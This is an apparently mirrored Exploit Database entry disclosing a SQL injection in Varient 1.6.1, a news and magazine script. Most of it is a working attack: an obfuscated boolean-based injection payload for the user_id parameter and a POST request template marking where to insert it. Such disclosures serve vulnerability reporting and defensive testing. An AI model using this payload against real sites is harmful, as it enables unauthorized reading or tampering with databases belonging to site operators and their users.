Varient 1.6.1 – SQL Injection

• Exploit Database
• 15 阅读

• 作者： Mehmet EMIROGLU
  日期： 2019-07-01
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/47058/

• ===========================================================================================
  # Exploit Title: Varient 1.6.1 SQL Inj.
  # Dork: N/A
  # Date: 29-06-2019
  # Exploit Author: Mehmet EMIROGLU
  # Vendor Homepage: https://varient.codingest.com/
  # Software Link: https://varient.codingest.com/
  # Version: v1.6.1
  # Category: Webapps
  # Tested on: Wamp64, Windows
  # CVE: N/A
  # Software Description: the best news and magazine script
  ===========================================================================================
  # POC - SQLi
  # Parameters : user_id
  # Attack Pattern :
  %27)/**/oR/**/3211170=3211170/**/aNd/**/(%276199%27)=(%276199
  # POST Method :
  https://site.com/unpleasant-nor-diminution-excellence-apartments-imprudence?parent_id=0&post_id=66&name=9956574&comment=[COMMENT
  HERE]7146048&user_id=99999999[SQL INJECT HERE]
  ===========================================================================================